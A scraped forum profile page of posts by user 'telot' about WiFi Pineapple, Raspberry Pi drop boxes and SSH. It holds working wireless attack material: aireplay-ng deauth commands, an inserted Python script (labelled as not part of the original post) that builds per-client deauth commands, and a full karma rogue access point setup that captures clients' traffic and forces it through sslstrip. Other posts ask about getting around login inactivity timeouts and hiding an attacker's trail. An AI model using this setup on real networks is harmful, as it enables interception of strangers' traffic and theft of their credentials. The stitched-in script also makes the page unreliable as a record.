telot

Dedicated Members
  • Posts

    803
  • Joined

  • Last visited

  • Days Won

    12

Everything posted by telot

  1. ssh user@host That's it. If you're switching ports and using keys, you're skipping to intermediate level without doing the beginner stuff. The most basic form of ssh is just what I put in above. That is where you should start if you're struggling. If you absolutely have to change the ssh port (and I don't blame you for a second), it'll look like this: ssh -p 8088 root@192.168.1.1 except with the port number you selected after the -p and your router's IP address after the @. I'm assuming that the router only has a root user as well - I'm not vividly familiar with dd-wrt. Enjoy! telot
  2. That right there. Sorry logicalconfusion, there's no way to simply/elegantly accomplish what you're after. There's just no off-the-shelf (open or closed source) product designed to do EXACTLY what you want. If you want it, you'll have to write it. Back to the thermite though, thermite is not explosive and doesn't necessarily have to set off the fire alarm. It IS extremely dangerous, of course. There was a con where the challenge was to destroy a 2U server rack of hard drives without setting off alarms or damaging other clients' stuff. And one guy successfully did it. I'll try to find the video and will update this post. If nothing else, it's fascinating to watch. telot
  3. http://www.dsd.gov.au/images/top35-table-2012.png Pretty interesting list. Overall it's very thorough and I really like how they have the "Helps mitigate Intrusion" through the various phases. My biggest qualm with it is the fact that User Education is number 20. I would have put it in the top 5...so the list has a top 5 instead of a top 4. Top 4 list? I mean come on telot
  4. Here is a very simplified version of what may work for you: airodump-ng mon0 See the connected clients of the AP you want to bring to your router. aireplay-ng -0 10 -a BS:SI:ID:OF:TARGETAP -c MA:CA:DD:RE:SS:OF VICTIM mon0 The client specified with the -c option will be deauth'd and may connect to the pineapple instead. You'll have to do this for each client you want to bring over, but it will accomplish what you want (bring over clients from the AP while not disconnecting you). telot
  5. Being that 34 people have read this and no one has responded, I'll go with the assumption that you all don't know how often it's used. How about I change my question then: Have any of you ever used chapcrack? Ever? telot
  6. I was thinking along a similar line. I know all this stuff, and I've known it for years and years. If not for the decent production value I would've skipped this video after the first 2 mins. It was when they confronted that kid with his own PIN issued by his bank, that I realized I'm not the intended audience, it's that guy. The kid is even young and seems to be decently tech-knowledgeable. I mean, people who are REALLY hopeless with security just won't buy this kind of stuff. They will go with their free printer that comes with the low-end computer they buy once every 4-5 years. It's the people in the middle that are the dangers to themselves. They consider themselves tech-savvy, and maybe they kind of are. But they're far from security-savvy, which makes for a very dangerous game of Russian roulette, with their information on the line. While the media hypes high-profile hacks on a weekly basis, no one is talking about personal computer security on the public stage. Maybe it's about time someone does. telot
  7. A proper cellular router is the most reliable and feature-rich way to get 3G to the pineapple, in my opinion. There are two main brands, Sierra Wireless's Airlink and the Digi Connect WAN. I'm a fan of the Digi since it is much more easily configurable and it runs python. See: http://www.bressner.de/webdocs/DIGI%20CONNECT%20WAN%203G.JPG It's what I use and I'll never go back to "dongles" ever again. Having a full-blown router as my gateway is so damn handy, plus I can power the pineapple from its USB port, easily/reliably attach high-gain antennas, set up a VPN to tunnel all my victims' traffic securely over the airwaves and web, man it's just the best. I highly recommend it. As for price, they retail around $600-750. I know that's steep, but I've seen some pop up on eBay that go for $50. I bought mine for $75 from eBay. Hope this helps telot
  8. Not really sure what you're asking. Does the pineapple still respond to probe requests? Yes, of course. Mine is sitting next to me right now and, when I turn on my laptop (OSX) boom, there's Toronto Pearson Airport wifi. Let me assure you, I'm far far far away from the Toronto airport right now. So yes, the pineapple still responds to probe requests. I think you asked if devices are sending them out differently - the answer is no. But what OSes do after they send out probe requests does differ and can change (after all, it's software). So like Windows 7 handles probe responses and insecure wifi much better than XP. I'm trying to remember the nuances right now, it might be that 7 will connect to a secure wifi with lower signal strength if it's in range, whereas XP would just connect to the strongest signal no matter what? Something like that, anyways different OSes do absolutely handle probe requests (when they send them out) and probe responses (how they handle it when APs "say yes") differently. That said, I don't think there have been any major changes to how any OSes do their probing or handle responses, so that's probably not the issue here. More likely, you had some good luck when you turned it on before, now you don't. I've noticed that good luck getting karma'd victims directly correlates with how target-rich the environment is. In order to convince any of us otherwise, you'll have to do some scientific-like testing. Turn on the pineapple and let it boot up with karma auto-enabled. Turn on an XP machine with an open SSID saved. Does it connect? How long does it take? Do this with 7, OSX, Ubuntu, Android, etc. Having a catalog of the behavior of different OSes could be really cool now that I think about it...Anyways, just saying that your pineapple "isn't what it used to be" doesn't give us much to go on by way of troubleshooting. telot
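The per-client deauth workflow the post describes, as an added example that is not part of telot's post: parse the CSV that `airodump-ng -w prefix` writes, pick out only the stations associated with the target BSSID, and build one targeted `aireplay-ng -0` command per client. The sample capture below is constructed for the example (no real dump); the interface name mon0 and the deauth count of 10 are taken from the post, and the `--to` mapping of CSV columns is an assumption about airodump-ng's station table layout (Station MAC, first seen, last seen, power, packets, BSSID, probed ESSIDs). Unassociated stations and clients of other access points are deliberately skipped, which is the point of the post: only the chosen clients get kicked.

```python
"""Added example, not code from the original post.

Parse an airodump-ng CSV capture, list the clients associated with a target
BSSID and build the per-client aireplay-ng deauth commands the post describes.
Assumptions (not in the post): the CSV follows airodump-ng's "-w prefix"
layout (AP table, blank line, station table), the monitor interface is mon0,
and the sample capture below is constructed, not a real dump.
"""
import csv
import io

# Constructed sample in airodump-ng CSV layout: two access points, then four
# stations (two on the target AP, one unassociated, one on a different AP).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2013-03-01 10:00:00, 2013-03-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,      120,       0,   0.  0.  0.  0,   8, CoffeeAP, 
66:77:88:99:AA:BB, 2013-03-01 10:00:00, 2013-03-01 10:05:00, 11,  54, OPN,  ,   , -70,       30,       0,   0.  0.  0.  0,   7, OtherAP, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:AA:AA:AA:AA:01, 2013-03-01 10:01:00, 2013-03-01 10:05:00, -50,       12, 00:11:22:33:44:55, CoffeeAP
AA:AA:AA:AA:AA:02, 2013-03-01 10:01:30, 2013-03-01 10:04:00, -55,        8, 00:11:22:33:44:55, 
AA:AA:AA:AA:AA:03, 2013-03-01 10:02:00, 2013-03-01 10:05:00, -60,        3, (not associated), FreeWifi,Home
AA:AA:AA:AA:AA:04, 2013-03-01 10:02:00, 2013-03-01 10:05:00, -65,        5, 66:77:88:99:AA:BB, OtherAP
"""


def parse_stations(text):
    """Return {station_mac: bssid} from the station table of an airodump-ng CSV.

    Everything before the 'Station MAC' header row is the AP table and is
    skipped.  Unassociated stations keep airodump's '(not associated)' marker
    as their BSSID so the caller can tell them apart from real associations.
    """
    stations = {}
    in_station_table = False
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row:
            continue
        if row[0].strip() == "Station MAC":
            in_station_table = True
            continue
        if in_station_table and len(row) >= 6:
            stations[row[0].strip().upper()] = row[5].strip().upper()
    return stations


def clients_of(text, bssid):
    """Station MACs currently associated with `bssid`, sorted for stable output."""
    bssid = bssid.upper()
    return sorted(mac for mac, ap in parse_stations(text).items() if ap == bssid)


def deauth_commands(text, bssid, iface="mon0", count=10):
    """One targeted aireplay-ng deauth per associated client.

    Using -c keeps the deauth aimed at the chosen station instead of a
    broadcast deauth that would also knock off your own connection (the
    post's reason for doing it one client at a time).
    """
    return [
        "aireplay-ng -0 %d -a %s -c %s %s" % (count, bssid.upper(), mac, iface)
        for mac in clients_of(text, bssid)
    ]


if __name__ == "__main__":
    for cmd in deauth_commands(SAMPLE_CSV, "00:11:22:33:44:55"):
        print(cmd)
```

Run it against a real capture by reading the `prefix-01.csv` file airodump-ng writes into `text`; the commands it prints are exactly the form the post gives, so they can be piped to a shell once you have confirmed the client list is the one you intend to move.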
  9. Haha, it was nice to refresh myself on your linux rants Apache! Welcome to the boards! Now get out of that ducky subforum and join us with the pineapple! telot
  10. The pineapple takes from 5 to 12V DC. You can throw any amp rating at it, it will only take what it needs. Just don't go above 12V. As for the cable, I second Foxtrot's suggestion. Just make one! It's super easy. Just make sure to have a voltmeter around to verify the polarity before you plug it in. Don't know what a voltmeter is? Do a merry jig, 'cause telot just gave you an opportunity to learn something. Cheers telot
  11. Mi Amor! Downloading opera right now (haven't run it in years, but this would be reason to). Thanks digip! telot
  12. Those are all good ideas digip, but I guess I should have explained myself a little better. I'm kind of hoping for a browser hack that will provide this functionality. The reason being, I have a dozen or more tabs open at once, and I bounce between the different dashboards doing my work. Sometimes I spend 10 minutes on one dashboard, and then when I go to view another one, that I was in the middle of doing something on, poof! I've been logged out. The solution would have to work with inactive tabs. Maybe I'm reaching here, and tbh, it's quite a first-world problem if you ask me lol Thanks for the tips digip, I think I'll look into what I can do with the cron to keep hidden tabs alive. telot
  13. Hey all - like a lot of admins, I use a lot of portals and dashboards for monitoring my network, servers, clouds, blah blah blah. Most of them feature inactivity timers for security reasons. They don't want you to get up from your computer, have someone else sit down, and have access to these websites with admin credentials. Sounds good, right? Well, I hate them. I diligently follow the best practice of always locking my workstation when I'm away from it. So I'm wondering if there's any known workarounds for these things. I've done some googling on the subject, but can only come up with code examples of how to apply an inactivity timer to a website, not how to circumvent them. Before I go looking through the javascript on each site to hack up my own workaround, I was hoping maybe some of you have a solution to this problem. I'd hate to reinvent the wheel, so if you know of anything that could help me out, I'd appreciate it. Thanks! telot
  14. Thanks Seb! Looking forward to it! Any chance we can sneak an ETA out of you? :) telot
  15. Great project Splicer! While we've seen several iterations of the pi as a dropbox, I've yet to see it paired with an LCD, nor have I seen the on-boot verification with python - both are very awesome additions to the typical 'load the pi up with tools and script them on after bootup' setup. One suggestion that comes to mind is to use some type of encryption (encfs should do the trick) so that when it is discovered by a victim, they can't trace it back to you. Adds a layer of security for you as the malicious attacker, or emulates what a malicious attacker would do if you're using this on a pentest. Without this encryption, anyone can boot it up and cat your python scripts to see the endpoint address, and that your username is twi7ch :) Overall excellent execution and excellent presentation. A+! telot
  16. Dude, you are in need of chill. 1) Do you know the IP of your router? If you don't know the IP of your router and you're running Windows (as I assume you are, I tl;dr'd your post man, sorry): Hold down the Windows key and press the "r" button. Type in: cmd Type in ipconfig in your command window. If you're plugged into your network with a cable, look for Local Area Connection. Note the "Default Gateway". If you're connected via wifi, look for Wireless LAN Adapter and note the Default Gateway. That is your router's IP address. Download PuTTY and in the big Host Name field, type in the IP of your router and click Open. That's it. 2) ssh tunneling is a proxy. Other proxies might be specialized computers on an enterprise network. In this case, the proxy is on your computer. All proxies sit in between your browser (that's properly configured to use the proxy) and the internet. So with ssh tunnels, all the packets that make up you going to a webpage in your browser are encrypted on your computer before they hit the wire. Anyways, ssh is really really really easy for those of us who've been using linux for years. It's like, the most basic of things. If you've really watched every episode of hak5 AND paid attention, you'd know this stuff. The series of episodes on ssh spell it out in gory detail. Anyways, good luck telot
  17. Hey guys - I know there's no metrics or anything, so I pose the question to you all. How commonplace is it for malicious sniffers to utilize chapcrack? Between ARP poisoning, IDS, wifi pineapples, or just sniffing the air, there's a lot of pcaps being created out there. Of the malicious sniffers, how many are cracking MS-CHAPv2? The reason I ask is because a friend still uses PPTP for his VPNs and for his WPA2-Enterprise RADIUS server. He claims that because PPTP is so easy to deploy and compatibility is through the roof, and that chapcrack's use is so rare, that it's worth sticking with MS-CHAPv2. With Darren's recent episode on installing a PPTP server (and subsequent episode apologizing and giving the how-to on OpenVPN) it's got me thinking about the issue again. I mean, chapcrack's been out for years now, and I almost never hear about it. Does the fact that you have to pay $20 to CloudCracker hinder its popularity? What do you think? telot
  18. Planetsourcecode is pure awesomeness. I too would like to thank you for the link digip! That's the second time one of your links has changed my life (the other being securitytube.net, years ago). whitehat: I'd love to see a public version of your code when you're done - if you know ruby at all, you could even add it to metasploit! Knowing what the user is up to without doing screengrabs could be a very useful tool for meterpreter. telot
  19. Finally a new and fresh contribution to the pineapple project! We've been lacking the last few weeks on new and exciting features (is it just me? or has the forums just been a fix-my-problem-athon lately?). Thanks very much Aranadin for your efforts and even more thanks for sharing. I will certainly be giving this a try soon. Keep up the great work! telot
  20. telot

    Pineapple Kali Pi

    Yep - the raspi-config is also oh-so-necessary for easily expanding the root fs to utilize your entire SD card telot
  21. telot

    Pineapple Kali Pi

    Check out Kali for Raspberry Pi icedevil433. It's a lot more solid than pwnpi for some things. Plus apt-get'ting all those tools on a fresh Raspbian install would be extremely painful...apt-get just takes forever on the pi! telot
  22. Hey WM - you still working on this one? I'm curious if you're able to pass through traffic between the wans and also supply internet for karma. If so, I'd love to see your IPTABLES pwnage, as I'm working on doing exactly this with my raspberry pi. Thanks man! telot
  23. Hey Zete: Here's the script I used to download the karma-patched hostapd.

    #!/bin/sh
    # bootup Module setup script
    #leave this echo
    echo "## Apt-getting ##"
    # build dependency for hostapd's nl80211 driver
    apt-get install libnl-dev -y
    #leave this echo
    echo "## Compiling ##"
    # only fetch and build once: skip if the installed binary is already there
    if ! which /usr/local/bin/hostapd > /dev/null; then
        echo "### Installing hostapd-karma ###"
        cd /tmp
        wget http://www.digininja.org/files/hostapd-1.0-karma.tar.bz2
        tar -jvxf hostapd-1.0-karma.tar.bz2
        cd hostapd-1.0-karma/hostapd
        make && make install
        cd ~
        # print the version to confirm the patched build is the one on the PATH
        hostapd -vv
        echo "### Installed hostapd-karma ###"
    fi
    #leave this echo
    echo "## Final Commands ##"
    # Enjoy - Leave me at Bottom - EOF

    Go into /etc/dnsmasq.conf and make sure interface=wlan0, then uncomment/add this line:

    dhcp-range=192.168.0.5,192.168.0.254,255.255.255.0,12h

    And you may need to change some things around in the patched karma hostapd.conf file as well. I had to change my driver to match my card, and changed the ssid to be broadcast.

    interface=wlan0
    driver=nl80211
    ssid=FreeInternet
    channel=1

    Then I made up a quick 'n' dirty telotscript to start it all up:

    #!/bin/sh
    # Start the karma AP, NAT its clients out, capture their traffic and push
    # HTTP/HTTPS through sslstrip.  Assumes wlan0 already carries 192.168.0.1
    # (the gateway for the dnsmasq range above) and that the box has an
    # upstream interface with a route to the internet.
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A POSTROUTING -j MASQUERADE
    # path of the karma tree on this box; the install script above extracts
    # into /tmp, so adjust this if you built it somewhere else
    cd /root/hostapd-1.0-karma/hostapd/
    ./hostapd -B /root/hostapd-1.0-karma/hostapd/hostapd.conf
    # full pcap of everything the clients do, in the background
    tcpdump -i wlan0 -w /root/cap.pcap -n net 192.168.0.0/24 &
    # bounce client web traffic into sslstrip's listener on port 10000
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
    sslstrip -w /root/sslstrip.log &

    There's nothing fancy about this install, there's no GUI, there's no dancing fruit, but it does work and works well. Please keep in mind I did this several months ago and may have missed something. So if the instructions are really bad (and they very well could be haha) let me know and I can do a proper write-up. But I think this should get you going in the right direction. telot
  24. Yes Easily with a 3G dongle or (what I prefer) a 3G cellular router. If I recall, I just followed digininja's instructions on his site. They're not pi-specific, so I had to do some tweaking...I can fire it up and report back the exact config if you want. telot